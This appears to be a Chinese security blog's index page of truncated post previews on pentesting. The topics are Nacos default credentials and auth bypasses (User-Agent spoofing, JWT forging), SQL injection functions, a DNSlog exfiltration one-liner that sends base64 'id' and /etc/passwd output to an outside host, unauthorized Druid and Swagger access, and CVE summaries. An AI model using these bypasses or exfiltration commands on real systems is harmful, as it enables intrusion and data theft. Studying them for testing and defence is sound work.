网络安全
未读Nacos
环境搭建
https://github.com/alibaba/nacos
启动路径 nacos/nacos-2.3.2/bin
启动命令
1$ ./startup.sh -m standalone
默认端口号 8888
1.默认口令
访问http://ip:8848/nacos/#/login进入登陆页面
默认口令为nacos/nacos
2.浏览器代理身份绕过(nacos<1.4.1)
将User-Agent: 更改为 Nacos-Server 即可绕过身份认证
以下为用户查询接口
添加用户接口
POST /nacos/v1/auth/users?username=takake&password=123456 HTTP/1.1
3.JWT伪造身份绕过(0.1.0<=nacos<=2.2.0)3.1.原理
nacos通过jwt进行身份认证,由于配置文件中存在默认jwt签名密钥,由于开发者安全意 ...
1.nacos安装配置
在github官网下载:https://github.com/alibaba/nacos
将文件包解压
在bin中使用startup文件进行启动,需要java8+环境
默认以集群方式启动,单机启动命令:
1$ ./startup.sh -m standalone
配置授权token
123456nacos.core.auth.enabled=truenacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789nacos.core.auth.server.identity.key=adminnacos.core.auth.server.identity.value=admin123nacos.console.ui.enabled=true
2.nacos集成springboot
直接获取nacos中值
1234567891011121314151617 <parent& ...
1.kafka下载和安装
下载地址
https://kafka.apache.org/downloads
直接下载.tgz 解压即安装完成
1$ tar -xvf kafka_2.13-3.7.1.tgz
2.启动运行2.1.通过zookeeper启动
通过zookeeper 启动 kafka
1234567891011121314# 先启动zookeeper 先进入目录下得bin目录$ ./zookeeper-server-start.sh ../config/zookeeper.properties &# 关闭zookeeper $ ./zookeeper-server-stop.sh ../config/zookeeper.properties# 启动kafka$ ./kafka-server-start.sh ../config/server.properties &# 关闭kafka$ ./kafka-server-stop.sh ../config/server.properties# 可以使用命令查看端口是否开启$ netstat -nlpt
...
网络安全
未读1.通用查询1.1.函数
concat(arg1,arg2,arg3); arg可拼接字符串或者查询语句或列名
group_concat(arg); 用于将当列中的所有数据拼接成一组返回
concat_ws(str1,arg1,arg2,arg3);使用str1将参数中的三个数据进行拼接
substr(str,argint1,argint2);表示字符串截取, argint1表示截取开始索引,argint2,表示截取长度,索引从1开始
mid,substr的完美替代品
123select mid((select database()),1,1);select mid((select database()) from 1 for 1);
ascii(arg), 用于字符返回的ascii码,返回数字,常用于二分法。可使用ord替代
extractvalue(1,concat(0x7e,(arg),0x7e));arg为查询参数,最长有效字符为32位
updatexml(1,concat(0x7e,(arg),0x7e),1);和上面同理
exp(arg); exp报错函数
slee ...
1.简介
在很多时候我们拿到一个RCE漏洞时可能存在没有回显的利用链,那么在这时,就需要我们通过出网,将我们执行命令的结果外带出来,以此来观察执行命令的结果。
其中我们主要是通过输入“$(cmd)”可以将执行命令的结果以请求参数的形式外带出来。
2.外网dnslog获取dnslog https://dnslog.cn/
1234567891011121314151617181920$ dig $(echo -n $(id) | base64 | head -c 63).g8mpq4.dnslog.cn# 命令解读, dig 解析域名 ,$() 调用返回结果作为参数调用,id 需要命令执行字符串,BASE64 将$(id)执行的结果进行BASE64编码,便于传输,head -c 63 只输出前0-63个字符,如果不足则全部输出# 如果说只需要取其中一段命令结果$ echo -n $(cat /etc/passwd) | base64 | head -c 127 | cut -c 64-# 这样就可以取到64到127的BASE64的字符串了,cut -c 64- 表示从第64个字符开始到 ...
网络安全
未读常见未授权访问漏洞利用1.Druid 未授权访问
Druid是阿里巴巴数据监控的一个软件。
1.1.路径地址
/druid/index.html
1.2.如何利用
可能未授权,在后续版本中可能需要登陆,因此可以尝试弱口令。
进入页面后,在首页中可以看到jdk的版本信息,后续如果要进行JNDI注入的话有利于利用链的选择。
我们还需要着重关注两个点,一个是URI监控,一个是Seesion监控
在URI监控中可以看到,该系统访问过接口的历史记录,这些接口都可以进行Fuzz测试。
在Session监控中我们可以看到,系统中存储的session历史记录,可以将这些session和URI中的接口组合起来进行测试。
因此可以编写爬虫或者利用burp inturder工具将这些这些数据爬取出来在工具中跑。
2.Swagger UI 未授权访问
Swagger ui 是一个用于设计、构建、文档化和使用RESTFUL风格的Web服务的开源框架。
2.1.路径地址
/swagger/v1/swagger.json
/do ...
1.漏洞简介CVE-2021-22205 漏洞详解CVE-2021-22205 是 GitLab 中的一个严重远程代码执行(RCE)漏洞,攻击者可以通过上传特制的恶意图片文件,利用 GitLab 对图像文件解析的缺陷,在目标服务器上执行任意命令。该漏洞的 CVSS 评分为 9.9,影响范围广泛,危害极大。
1. 漏洞背景GitLab 是一个基于 Web 的 DevOps 生命周期工具,提供 Git 存储库管理、持续集成和部署等功能。该漏洞的核心问题在于 GitLab 的 ExifTool 组件未能正确处理传入的图像文件,导致攻击者可以通过上传恶意图片文件触发远程代码执行。
2. 漏洞原理漏洞的核心在于 GitLab 对图像文件的解析机制:
ExifTool 解析缺陷:
GitLab 使用 ExifTool 解析上传的图像文件,但未对文件内容进行严格验证。
攻击者可以通过构造包含恶意代码的 DjVu 格式图片文件,利用 ExifTool 的解析逻辑触发命令执行。
恶意文件构造:
攻击者使用 DjVu 格式的图片文件,并在文件中嵌入恶意 OGNL(Object-Graph N ...
1.漏洞简介CVE-2017-3066 漏洞详解CVE-2017-3066 是 Adobe ColdFusion 中的一个严重反序列化漏洞,攻击者可以通过构造恶意的 AMF(Action Message Format)请求,触发反序列化操作,从而在目标服务器上执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及复现步骤。
1. 漏洞背景Adobe ColdFusion 是一个动态 Web 服务器,支持 CFML(ColdFusion Markup Language)脚本语言,广泛用于构建 Web 应用程序。该漏洞的核心问题在于 ColdFusion 对 AMF 请求的反序列化处理存在缺陷,导致攻击者可以通过构造恶意请求实现远程代码执行(RCE)。
2. 漏洞原理漏洞的核心在于 ColdFusion 的 AMF 反序列化机制:
AMF 协议:
AMF 是一种用于客户端与服务器之间通信的二进制协议,常用于 Flash 和 Flex 应用程序。
ColdFusion 通过 /flex2gateway/amf 端点处理 AMF 请求。
反序列化漏洞:
Cold ...
1.漏洞简介6.CVE-2022-26134 漏洞详解CVE-2022-26134 是 Atlassian Confluence 中的一个严重远程代码执行(RCE)漏洞,也称为 Confluence OGNL 注入漏洞。该漏洞允许攻击者通过构造恶意的 OGNL(Object-Graph Navigation Language)表达式,在未经身份验证的情况下远程执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及复现步骤。
1. 漏洞背景Atlassian Confluence 是一款广泛使用的企业级 Wiki 和知识管理工具,用于团队协作和信息共享。2022 年 6 月,Atlassian 发布安全公告,披露了 Confluence Server 和 Data Center 中的一个严重漏洞(CVE-2022-26134),攻击者可以通过 OGNL 注入实现远程代码执行,危害极大。
2. CVSS V3 评分
CVSS V3 评分:9.8(高危)
3. 漏洞原理漏洞的核心在于 Confluence 对用户输入的 OGNL 表达式处理不当:
OGNL 注入:
...
1.漏洞简介CVE-2022-22947 漏洞详解CVE-2022-22947 是 Spring Cloud Gateway 中的一个严重远程代码执行(RCE)漏洞,也称为 Spring Cloud Gateway SpEL 注入漏洞。该漏洞允许攻击者通过构造恶意的请求,利用 Spring 表达式语言(SpEL)注入,在目标服务器上执行任意代码。以下是该漏洞的详细解析,包括漏洞原理、利用条件、影响版本及修复建议。
1. 漏洞背景Spring Cloud Gateway 是 Spring Cloud 生态系统中的一个 API 网关,用于为微服务架构提供路由、负载均衡、安全控制等功能。该漏洞的核心问题在于 Spring Cloud Gateway 的 Actuator 端点,当该端点被启用并暴露时,攻击者可以通过发送恶意请求触发 SpEL 表达式注入,从而实现远程代码执行。
2. 漏洞原理漏洞的核心在于 Spring Cloud Gateway 对 SpEL 表达式的处理机制:
Actuator 端点:
Spring Boot Actuator 提供了管理和监控应用程序的功能,包括 ...